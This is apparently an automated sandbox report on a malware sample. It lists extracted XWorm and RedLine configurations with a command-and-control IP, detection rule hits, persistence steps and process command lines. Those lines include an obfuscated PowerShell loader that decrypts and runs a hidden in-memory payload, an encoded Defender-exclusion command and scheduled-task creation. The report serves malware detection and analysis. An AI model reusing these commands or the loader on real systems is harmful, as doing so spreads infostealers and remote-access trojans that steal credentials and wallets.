Analysis
-
max time kernel
93s -
max time network
95s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
30-06-2024 01:03
Static task
static1
Behavioral task
behavioral1
Sample
1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe
Resource
win10v2004-20240508-en
General
-
Target
1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe
-
Size
15.6MB
-
MD5
ad3893ee2a8e40f2700236672635f5aa
-
SHA1
80f3c0bc398c473e32eeb1420218be6a5feb291d
-
SHA256
1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727
-
SHA512
748db720695d028c034367f0af26d80ced9700dc497a82ce5a4ce578b39fb24c0f869ddbae3b542b15718523fa3cd29c11f78ded0f9f748ac4954256472a4111
-
SSDEEP
196608:IZu1YQGj4ZSo3jXkpiliRElNhT7kiibJ488hEipzLmCKg4EFJ9UHytjAIgwX4FVE:+u1OjJEIZulNyHytjma0VvjZ6
Malware Config
Extracted
xworm
94.156.8.186:7000
-
Install_directory
%AppData%
-
install_file
svchost.exe
Extracted
redline
cracked
94.156.8.186:37552
Signatures
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
Processes:
resource yara_rule behavioral2/memory/2712-554-0x00000000080B0000-0x00000000080BE000-memory.dmp disable_win_def -
Detect Xworm Payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/2712-268-0x0000000004810000-0x0000000004826000-memory.dmp family_xworm -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/1652-272-0x00000000053F0000-0x000000000540E000-memory.dmp family_redline -
SectopRAT payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/1652-272-0x00000000053F0000-0x000000000540E000-memory.dmp family_sectoprat -
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/2712-555-0x0000000008FA0000-0x00000000090BE000-memory.dmp family_stormkitty -
Detect binaries embedding considerable number of cryptocurrency wallet browser extension IDs. 1 IoCs
Processes:
resource yara_rule behavioral2/memory/1652-272-0x00000000053F0000-0x000000000540E000-memory.dmp INDICATOR_SUSPICIOUS_Binary_Embedded_Crypto_Wallet_Browser_Extension_IDs -
Detects Windows executables referencing non-Windows User-Agents 3 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\Xworm V5.6.exe INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral2/memory/1836-37-0x000001E2E3BE0000-0x000001E2E4AC8000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral2/memory/2712-268-0x0000000004810000-0x0000000004826000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA -
Detects executables (downlaoders) containing URLs to raw contents of a paste 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\Xworm V5.6.exe INDICATOR_SUSPICIOUS_EXE_RawPaste_URL behavioral2/memory/1836-37-0x000001E2E3BE0000-0x000001E2E4AC8000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RawPaste_URL -
Detects executables containing artifacts associated with disabling Widnows Defender 1 IoCs
Processes:
resource yara_rule behavioral2/memory/2712-554-0x00000000080B0000-0x00000000080BE000-memory.dmp INDICATOR_SUSPICIOUS_DisableWinDefender -
Detects executables embedding registry key / value combination indicative of disabling Windows Defender features 1 IoCs
Processes:
resource yara_rule behavioral2/memory/2712-554-0x00000000080B0000-0x00000000080BE000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RegKeyComb_DisableWinDefender -
Detects executables referencing Windows vault credential objects. Observed in infostealers 1 IoCs
Processes:
resource yara_rule behavioral2/memory/2712-555-0x0000000008FA0000-0x00000000090BE000-memory.dmp INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID -
Detects executables referencing credit card regular expressions 1 IoCs
Processes:
resource yara_rule behavioral2/memory/2712-555-0x0000000008FA0000-0x00000000090BE000-memory.dmp INDICATOR_SUSPICIOUS_EXE_CC_Regex -
Detects executables using Telegram Chat Bot 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\Xworm V5.6.exe INDICATOR_SUSPICIOUS_EXE_TelegramChatBot behavioral2/memory/1836-37-0x000001E2E3BE0000-0x000001E2E4AC8000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TelegramChatBot -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2460 powershell.exe 4932 powershell.exe 920 powershell.exe 1948 powershell.exe 1120 powershell.exe 4612 powershell.exe 3340 powershell.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
xworm.bat.exexfixer.bat.exeWScript.exeWScript.exestartup_str_810.bat.exestartup_str_256.bat.exe1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation xworm.bat.exe Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation xfixer.bat.exe Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation startup_str_810.bat.exe Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation startup_str_256.bat.exe Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe -
Executes dropped EXE 5 IoCs
Processes:
Xworm V5.6.exexfixer.bat.exexworm.bat.exestartup_str_810.bat.exestartup_str_256.bat.exepid process 1836 Xworm V5.6.exe 1304 xfixer.bat.exe 544 xworm.bat.exe 2712 startup_str_810.bat.exe 1652 startup_str_256.bat.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
startup_str_810.bat.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe" startup_str_810.bat.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 16 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1988 2712 WerFault.exe startup_str_810.bat.exe -
Modifies registry class 2 IoCs
Processes:
xfixer.bat.exexworm.bat.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings xfixer.bat.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings xworm.bat.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
startup_str_810.bat.exepid process 2712 startup_str_810.bat.exe -
Suspicious behavior: EnumeratesProcesses 33 IoCs
Processes:
powershell.exexfixer.bat.exexworm.bat.exepowershell.exepowershell.exepowershell.exepowershell.exestartup_str_810.bat.exestartup_str_256.bat.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2460 powershell.exe 2460 powershell.exe 1304 xfixer.bat.exe 1304 xfixer.bat.exe 544 xworm.bat.exe 544 xworm.bat.exe 4796 powershell.exe 4596 powershell.exe 4796 powershell.exe 4596 powershell.exe 4932 powershell.exe 920 powershell.exe 4932 powershell.exe 920 powershell.exe 2712 startup_str_810.bat.exe 1652 startup_str_256.bat.exe 2712 startup_str_810.bat.exe 1652 startup_str_256.bat.exe 228 powershell.exe 228 powershell.exe 2876 powershell.exe 2876 powershell.exe 3340 powershell.exe 3340 powershell.exe 1948 powershell.exe 1948 powershell.exe 1652 startup_str_256.bat.exe 1120 powershell.exe 1120 powershell.exe 1652 startup_str_256.bat.exe 1652 startup_str_256.bat.exe 4612 powershell.exe 4612 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exexfixer.bat.exexworm.bat.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2460 powershell.exe Token: SeDebugPrivilege 1304 xfixer.bat.exe Token: SeDebugPrivilege 544 xworm.bat.exe Token: SeDebugPrivilege 4796 powershell.exe Token: SeDebugPrivilege 4596 powershell.exe Token: SeIncreaseQuotaPrivilege 4796 powershell.exe Token: SeSecurityPrivilege 4796 powershell.exe Token: SeTakeOwnershipPrivilege 4796 powershell.exe Token: SeLoadDriverPrivilege 4796 powershell.exe Token: SeSystemProfilePrivilege 4796 powershell.exe Token: SeSystemtimePrivilege 4796 powershell.exe Token: SeProfSingleProcessPrivilege 4796 powershell.exe Token: SeIncBasePriorityPrivilege 4796 powershell.exe Token: SeCreatePagefilePrivilege 4796 powershell.exe Token: SeBackupPrivilege 4796 powershell.exe Token: SeRestorePrivilege 4796 powershell.exe Token: SeShutdownPrivilege 4796 powershell.exe Token: SeDebugPrivilege 4796 powershell.exe Token: SeSystemEnvironmentPrivilege 4796 powershell.exe Token: SeRemoteShutdownPrivilege 4796 powershell.exe Token: SeUndockPrivilege 4796 powershell.exe Token: SeManageVolumePrivilege 4796 powershell.exe Token: 33 4796 powershell.exe Token: 34 4796 powershell.exe Token: 35 4796 powershell.exe Token: 36 4796 powershell.exe Token: SeIncreaseQuotaPrivilege 4596 powershell.exe Token: SeSecurityPrivilege 4596 powershell.exe Token: SeTakeOwnershipPrivilege 4596 powershell.exe Token: SeLoadDriverPrivilege 4596 powershell.exe Token: SeSystemProfilePrivilege 4596 powershell.exe Token: SeSystemtimePrivilege 4596 powershell.exe Token: SeProfSingleProcessPrivilege 4596 powershell.exe Token: SeIncBasePriorityPrivilege 4596 powershell.exe Token: SeCreatePagefilePrivilege 4596 powershell.exe Token: SeBackupPrivilege 4596 powershell.exe Token: SeRestorePrivilege 4596 powershell.exe Token: SeShutdownPrivilege 4596 powershell.exe Token: SeDebugPrivilege 4596 powershell.exe Token: SeSystemEnvironmentPrivilege 4596 powershell.exe Token: SeRemoteShutdownPrivilege 4596 powershell.exe Token: SeUndockPrivilege 4596 powershell.exe Token: SeManageVolumePrivilege 4596 powershell.exe Token: 33 4596 powershell.exe Token: 34 4596 powershell.exe Token: 35 4596 powershell.exe Token: 36 4596 powershell.exe Token: SeDebugPrivilege 4932 powershell.exe Token: SeDebugPrivilege 920 powershell.exe Token: SeIncreaseQuotaPrivilege 4932 powershell.exe Token: SeSecurityPrivilege 4932 powershell.exe Token: SeTakeOwnershipPrivilege 4932 powershell.exe Token: SeLoadDriverPrivilege 4932 powershell.exe Token: SeSystemProfilePrivilege 4932 powershell.exe Token: SeSystemtimePrivilege 4932 powershell.exe Token: SeProfSingleProcessPrivilege 4932 powershell.exe Token: SeIncBasePriorityPrivilege 4932 powershell.exe Token: SeCreatePagefilePrivilege 4932 powershell.exe Token: SeBackupPrivilege 4932 powershell.exe Token: SeRestorePrivilege 4932 powershell.exe Token: SeShutdownPrivilege 4932 powershell.exe Token: SeDebugPrivilege 4932 powershell.exe Token: SeSystemEnvironmentPrivilege 4932 powershell.exe Token: SeRemoteShutdownPrivilege 4932 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.execmd.execmd.exexworm.bat.exexfixer.bat.exeWScript.exeWScript.execmd.execmd.exestartup_str_810.bat.exestartup_str_256.bat.exedescription pid process target process PID 1060 wrote to memory of 2460 1060 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe powershell.exe PID 1060 wrote to memory of 2460 1060 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe powershell.exe PID 1060 wrote to memory of 2460 1060 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe powershell.exe PID 1060 wrote to memory of 1824 1060 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe cmd.exe PID 1060 wrote to memory of 1824 1060 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe cmd.exe PID 1060 wrote to memory of 1824 1060 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe cmd.exe PID 1060 wrote to memory of 3304 1060 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe cmd.exe PID 1060 wrote to memory of 3304 1060 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe cmd.exe PID 1060 wrote to memory of 3304 1060 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe cmd.exe PID 1060 wrote to memory of 1836 1060 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe Xworm V5.6.exe PID 1060 wrote to memory of 1836 1060 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe Xworm V5.6.exe PID 3304 wrote to memory of 1304 3304 cmd.exe xfixer.bat.exe PID 3304 wrote to memory of 1304 3304 cmd.exe xfixer.bat.exe PID 3304 wrote to memory of 1304 3304 cmd.exe xfixer.bat.exe PID 1824 wrote to memory of 544 1824 cmd.exe xworm.bat.exe PID 1824 wrote to memory of 544 1824 cmd.exe xworm.bat.exe PID 1824 wrote to memory of 544 1824 cmd.exe xworm.bat.exe PID 544 wrote to memory of 4796 544 xworm.bat.exe powershell.exe PID 544 wrote to memory of 4796 544 xworm.bat.exe powershell.exe PID 544 wrote to memory of 4796 544 xworm.bat.exe powershell.exe PID 1304 wrote to memory of 4596 1304 xfixer.bat.exe powershell.exe PID 1304 wrote to memory of 4596 1304 xfixer.bat.exe powershell.exe PID 1304 wrote to memory of 4596 1304 xfixer.bat.exe powershell.exe PID 544 wrote to memory of 4932 544 xworm.bat.exe powershell.exe PID 544 wrote to memory of 4932 544 xworm.bat.exe powershell.exe PID 544 wrote to memory of 4932 544 xworm.bat.exe powershell.exe PID 1304 wrote to memory of 920 1304 xfixer.bat.exe powershell.exe PID 1304 wrote to memory of 920 1304 xfixer.bat.exe powershell.exe PID 1304 wrote to memory of 920 1304 xfixer.bat.exe powershell.exe PID 1304 wrote to memory of 3844 1304 xfixer.bat.exe WScript.exe PID 1304 wrote to memory of 3844 1304 xfixer.bat.exe WScript.exe PID 1304 wrote to memory of 3844 1304 xfixer.bat.exe WScript.exe PID 544 wrote to memory of 1788 544 xworm.bat.exe WScript.exe PID 544 wrote to memory of 1788 544 xworm.bat.exe WScript.exe PID 544 wrote to memory of 1788 544 xworm.bat.exe WScript.exe PID 3844 wrote to memory of 232 3844 WScript.exe cmd.exe PID 3844 wrote to memory of 232 3844 WScript.exe cmd.exe PID 3844 wrote to memory of 232 3844 WScript.exe cmd.exe PID 1788 wrote to memory of 464 1788 WScript.exe cmd.exe PID 1788 wrote to memory of 464 1788 WScript.exe cmd.exe PID 1788 wrote to memory of 464 1788 WScript.exe cmd.exe PID 232 wrote to memory of 2712 232 cmd.exe startup_str_810.bat.exe PID 232 wrote to memory of 2712 232 cmd.exe startup_str_810.bat.exe PID 232 wrote to memory of 2712 232 cmd.exe startup_str_810.bat.exe PID 464 wrote to memory of 1652 464 cmd.exe startup_str_256.bat.exe PID 464 wrote to memory of 1652 464 cmd.exe startup_str_256.bat.exe PID 464 wrote to memory of 1652 464 cmd.exe startup_str_256.bat.exe PID 2712 wrote to memory of 228 2712 startup_str_810.bat.exe powershell.exe PID 2712 wrote to memory of 228 2712 startup_str_810.bat.exe powershell.exe PID 2712 wrote to memory of 228 2712 startup_str_810.bat.exe powershell.exe PID 1652 wrote to memory of 2876 1652 startup_str_256.bat.exe powershell.exe PID 1652 wrote to memory of 2876 1652 startup_str_256.bat.exe powershell.exe PID 1652 wrote to memory of 2876 1652 startup_str_256.bat.exe powershell.exe PID 2712 wrote to memory of 3340 2712 startup_str_810.bat.exe powershell.exe PID 2712 wrote to memory of 3340 2712 startup_str_810.bat.exe powershell.exe PID 2712 wrote to memory of 3340 2712 startup_str_810.bat.exe powershell.exe PID 2712 wrote to memory of 1948 2712 startup_str_810.bat.exe powershell.exe PID 2712 wrote to memory of 1948 2712 startup_str_810.bat.exe powershell.exe PID 2712 wrote to memory of 1948 2712 startup_str_810.bat.exe powershell.exe PID 2712 wrote to memory of 1120 2712 startup_str_810.bat.exe powershell.exe PID 2712 wrote to memory of 1120 2712 startup_str_810.bat.exe powershell.exe PID 2712 wrote to memory of 1120 2712 startup_str_810.bat.exe powershell.exe PID 2712 wrote to memory of 4612 2712 startup_str_810.bat.exe powershell.exe PID 2712 wrote to memory of 4612 2712 startup_str_810.bat.exe powershell.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe"C:\Users\Admin\AppData\Local\Temp\1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1060 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AdABsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcAbgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdQBoACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAdQBpACMAPgA="2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2460 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\xworm.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:1824 -
C:\Users\Admin\AppData\Roaming\xworm.bat.exe"xworm.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_TxKiz = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\xworm.bat').Split([Environment]::NewLine);foreach ($_CASH_XMOQm in $_CASH_TxKiz) { if ($_CASH_XMOQm.StartsWith(':: @')) { $_CASH_ssYCl = $_CASH_XMOQm.Substring(4); break; }; };$_CASH_ssYCl = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ssYCl, '_CASH_', '');$_CASH_CfCmx = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_ssYCl);$_CASH_tsEof = New-Object System.Security.Cryptography.AesManaged;$_CASH_tsEof.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_tsEof.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_tsEof.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+ZLOxcnfG7i9YTWJ7vLTmQj82ou3KT503uJ1I+7Wo6U=');$_CASH_tsEof.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/z4iXtMuBf06DnNNej/bVw==');$_CASH_KWHai = $_CASH_tsEof.CreateDecryptor();$_CASH_CfCmx = $_CASH_KWHai.TransformFinalBlock($_CASH_CfCmx, 0, $_CASH_CfCmx.Length);$_CASH_KWHai.Dispose();$_CASH_tsEof.Dispose();$_CASH_fYpGJ = New-Object System.IO.MemoryStream(, $_CASH_CfCmx);$_CASH_FImSp = New-Object System.IO.MemoryStream;$_CASH_aydNz = New-Object System.IO.Compression.GZipStream($_CASH_fYpGJ, [IO.Compression.CompressionMode]::Decompress);$_CASH_aydNz.CopyTo($_CASH_FImSp);$_CASH_aydNz.Dispose();$_CASH_fYpGJ.Dispose();$_CASH_FImSp.Dispose();$_CASH_CfCmx = $_CASH_FImSp.ToArray();$_CASH_MWQwC = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_CfCmx);$_CASH_eABCx = $_CASH_MWQwC.EntryPoint;$_CASH_eABCx.Invoke($null, (, [string[]] ('')))3⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:544 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\xworm')4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4796 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_256_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_256.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4932 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_256.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1788 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_256.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:464 -
C:\Users\Admin\AppData\Roaming\startup_str_256.bat.exe"startup_str_256.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_TxKiz = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_256.bat').Split([Environment]::NewLine);foreach ($_CASH_XMOQm in $_CASH_TxKiz) { if ($_CASH_XMOQm.StartsWith(':: @')) { $_CASH_ssYCl = $_CASH_XMOQm.Substring(4); break; }; };$_CASH_ssYCl = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ssYCl, '_CASH_', '');$_CASH_CfCmx = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_ssYCl);$_CASH_tsEof = New-Object System.Security.Cryptography.AesManaged;$_CASH_tsEof.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_tsEof.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_tsEof.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+ZLOxcnfG7i9YTWJ7vLTmQj82ou3KT503uJ1I+7Wo6U=');$_CASH_tsEof.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/z4iXtMuBf06DnNNej/bVw==');$_CASH_KWHai = $_CASH_tsEof.CreateDecryptor();$_CASH_CfCmx = $_CASH_KWHai.TransformFinalBlock($_CASH_CfCmx, 0, $_CASH_CfCmx.Length);$_CASH_KWHai.Dispose();$_CASH_tsEof.Dispose();$_CASH_fYpGJ = New-Object System.IO.MemoryStream(, $_CASH_CfCmx);$_CASH_FImSp = New-Object System.IO.MemoryStream;$_CASH_aydNz = New-Object System.IO.Compression.GZipStream($_CASH_fYpGJ, [IO.Compression.CompressionMode]::Decompress);$_CASH_aydNz.CopyTo($_CASH_FImSp);$_CASH_aydNz.Dispose();$_CASH_fYpGJ.Dispose();$_CASH_FImSp.Dispose();$_CASH_CfCmx = $_CASH_FImSp.ToArray();$_CASH_MWQwC = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_CfCmx);$_CASH_eABCx = $_CASH_MWQwC.EntryPoint;$_CASH_eABCx.Invoke($null, (, [string[]] ('')))6⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1652 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\startup_str_256')7⤵
- Suspicious behavior: EnumeratesProcesses
PID:2876 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c choice /c y /n /d y /t 1 & attrib -h -s "C:\Users\Admin\AppData\Roaming\startup_str_256.bat.exe" & del "C:\Users\Admin\AppData\Roaming\startup_str_256.bat.exe"7⤵PID:3524
-
C:\Windows\SysWOW64\choice.exechoice /c y /n /d y /t 18⤵PID:3180
-
C:\Windows\SysWOW64\attrib.exeattrib -h -s "C:\Users\Admin\AppData\Roaming\startup_str_256.bat.exe"8⤵
- Views/modifies file attributes
PID:3800 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\xfixer.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:3304 -
C:\Users\Admin\AppData\Roaming\xfixer.bat.exe"xfixer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_CnGzR = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\xfixer.bat').Split([Environment]::NewLine);foreach ($_CASH_qdZmU in $_CASH_CnGzR) { if ($_CASH_qdZmU.StartsWith(':: @')) { $_CASH_ZoWEj = $_CASH_qdZmU.Substring(4); break; }; };$_CASH_ZoWEj = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ZoWEj, '_CASH_', '');$_CASH_fXadG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_ZoWEj);$_CASH_HMtAt = New-Object System.Security.Cryptography.AesManaged;$_CASH_HMtAt.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_HMtAt.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_HMtAt.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fIynBYcBUpBBez+nt2djmwJqlIyvat7HzgVRpfM2ODQ=');$_CASH_HMtAt.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+5/SuT9a8EJc5rjsiLxvRg==');$_CASH_tRKDk = $_CASH_HMtAt.CreateDecryptor();$_CASH_fXadG = $_CASH_tRKDk.TransformFinalBlock($_CASH_fXadG, 0, $_CASH_fXadG.Length);$_CASH_tRKDk.Dispose();$_CASH_HMtAt.Dispose();$_CASH_xnUdL = New-Object System.IO.MemoryStream(, $_CASH_fXadG);$_CASH_gkSYz = New-Object System.IO.MemoryStream;$_CASH_UMTAN = New-Object System.IO.Compression.GZipStream($_CASH_xnUdL, [IO.Compression.CompressionMode]::Decompress);$_CASH_UMTAN.CopyTo($_CASH_gkSYz);$_CASH_UMTAN.Dispose();$_CASH_xnUdL.Dispose();$_CASH_gkSYz.Dispose();$_CASH_fXadG = $_CASH_gkSYz.ToArray();$_CASH_lwuuH = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_fXadG);$_CASH_pYHCE = $_CASH_lwuuH.EntryPoint;$_CASH_pYHCE.Invoke($null, (, [string[]] ('')))3⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1304 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\xfixer')4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4596 -
